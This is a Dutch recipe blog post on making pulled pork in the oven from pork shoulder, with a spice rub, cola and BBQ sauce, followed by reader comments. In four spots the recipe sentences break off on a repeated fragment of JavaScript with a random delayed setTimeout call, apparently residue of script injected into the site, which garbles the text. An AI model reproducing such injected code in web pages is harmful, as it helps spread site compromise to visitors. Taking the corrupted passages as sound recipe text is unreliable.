Pulled Pork Recept om thuis te maken!

Wat zo leuk is als je van eten houdt, is om hier zoveel mogelijk over te praten. Thuis, maar ook op het werk zijn er collega’s die dezelfde foodpassie delen. De leukste recepten en ideeën worden uitgewisseld bij de koffietafel. De een nog lekkerder dan het ander, je krijgt er soms gewoon spontaan trek van! Zo ook dit ‘lazy pulled pork’ recept van mijn collega Erwin. De food truck festival hit van dit jaar; een broodje pulled pork!

Op elk festival kwam je dit heerlijke broodje wel tegen; Pulled Pork. Vaak ter plaatse bereid in een enorme smoker, op een ambachtelijk broodje, ik begin  al weer te kwijlen. Je betaalt er de hoofdprijs voor, maar het is het absoluut waard. En nu blijkt het ook nog eens super eenvoudig om te maken. Zonder smoker, maar in de oven (Ik gok dat jullie ook geen enorm rook-geval in de tuin hebben staan). Het kost even wat tijd, maar dat is voornamelijk wachten. De voorbereidingstijd is ongeveer 20 minuutjes, vandaar de naam “Luie” Pulled Pork.

De Basis

Een mooi stuk “procureur”. Procureur wordt van het schouder-/nekdeel van het varken gesneden en is flink vet. Dat is belangrijk, want hierdoor zal je vlees ontzettend mals & zacht worden. Je kunt de slager vragen het been er uit te snijden, maar dit hoeft niet.
Procureur is ook nog eens heel betaalbaar. Voor een stuk van ruim 2 kilo betaalde ik net geen 8 euro bij de slager. Je hebt dan wel een flinke braadpan nodig. In mijn braadpan van circa 35 cm doorsnede kan ik een stuk van circa 2 kilo net kwijt. Houd er rekening mee dat je 25% dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot 50% van het gewicht kwijt raakt tijdens de bereiding.
Pulled Pork | Viving
Pulled Pork Procureur | Viving

De Rub

We gaan het vlees lekker inwrijven met smaak. Hiervoor maken we een rub van cayennepeper, paprikapoeder (gerookt het liefst), venkelzaad, komijn, bruine suiker en een beetje zout. Meng de kruiden in een vijzel of keukenmachine en maal het dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totdat alles even fijn is. Vervolgens wrijf je het vlees aan alle kanten in. Pak het vlees weer goed in en leg het een nacht in de koelkast, zodat het goed kan intrekken.

De saus

Pulled Pork wordt gegaard onder een laagje saus. Ik vind zelf een extra “smokey” variant van een goede bbq-saus het lekkerst, maar laat je ook hier leiden door je eigen smaak. Houd alvast een derde van de bbq-saus apart voor later. De rest meng je met een half glas cola.

De volgende stap…

Haal de procureur op tijd uit de koelkast en laat hem op kamertemperatuur komen. Ondertussen kun je je oven vast op 120 graden voorverwarmen. De temperatuur is inderdaad vrij laag, maar dat is juist de truc van Pulled Pork, lekker langzaam en op lage temperatuur. Leg de procureur in een ingevette braadpan en schenk het mengsel van cola & saus er overheen. Deksel erop en dan de eerste 4 uur in de oven (op 120 graden dus).
Vervolgens smeer je een bruine boterham. Als je de verleiding van de lekkere geuren wilt kunnen weerstaan, is het verstandig om een volle maag te hebben.
Na 4 uur verhoog je de temperatuur naar 150 graden en zet je de timer weer op 4 uur. 5 mag ook. Het laatste half uur haal je de deksel van de pan, hierdoor zal het vlees een knapperige korst krijgen. Superlekker!
Als de tijd verstreken is haal je de pan uit de oven en laat je deze met de deksel er op een half uur dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot een uur afkoelen. Je zult zien dat er vrij veel vocht in de pan staat. Dat mag je absoluut niet weggooien, hier zit enorm veel smaak in.
We gaan het vlees nu uit elkaar trekken. Gebruik hiervoor twee vorken en trek het vlees voorzichtig dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot snippers. Je zult zien dat het heel makkelijk gaat. Meng het vlees nu met de sappen die al in de pan zitten.
Het beetje bbq-saus dat je apart hebt gehouden gaat er nu weer bij, voor extra smaak. Je kunt de Pulled Pork koud serveren, maar warm is ook lekker. Bijvoorbeeld op een vers broodje met een beetje coleslaw of geroosterde groenten.

Variatietip Pulled Pork

Mocht je echt creatief willen doen, dan kun je er ook een soort cupcakes van maken. Gebruik hiervoor een muffin-vorm die je bekleed met velletjes croissantdeeg. Beetje pulled pork er in en afbakken in de oven.
Bedankt Erwin voor dit heerlijke recept! Ik ga dit snel een keer proberen!!
Broodje Pulled Pork | Viving

3 Reacties op "Pulled Pork Recept om thuis te maken!"

 • comment-avatar
  elske van den elsaker 17 februari 2016 (23:33)

  Vraagje, het kan aan mij liggen dat ik het niet zie maar kan ik een recept, bijv. van pulled pork, niet printen lijkt me handig in de keuken wanneer ik het ga maken.
  Ik hoor het graag van je, met vriendelijke groet roet, Elske van den Elsaker

  • Anouk - Viving.nl
   Anouk - Viving.nl 18 februari 2016 (17:45)

   Hallo Elske, bedankt voor je reactie! Toevallig ben ik bezig met het omzetten van de recepten in een nieuwe stijl zodat je alle recepten eenvoudig kunt printen en de ingrediënten kan afvinken voor je boodschappen lijstje. Inderdaad wel zo makkelijk… De nieuwste recepten staan al in de nieuwe stijl, maar het recept voor pulled pork nog niet, hier wordt hard aan gewerkt. 🙂 Ben benieuwd wat je hiervan vindt, zie bijvoorbeeld: http://www.viving.nl/stoofvlees/. Groetjes Anouk

 • comment-avatar
  Henny 21 maart 2017 (13:14)

  Beetje onduidelijk recept
  Ik weet soms kook je op ‘gevoel’ maar hoeveel bbq saus’kruiden en cola wordt er gebruikt?

Plaats een reactie:

Je emailadres wordt niet weergegeven.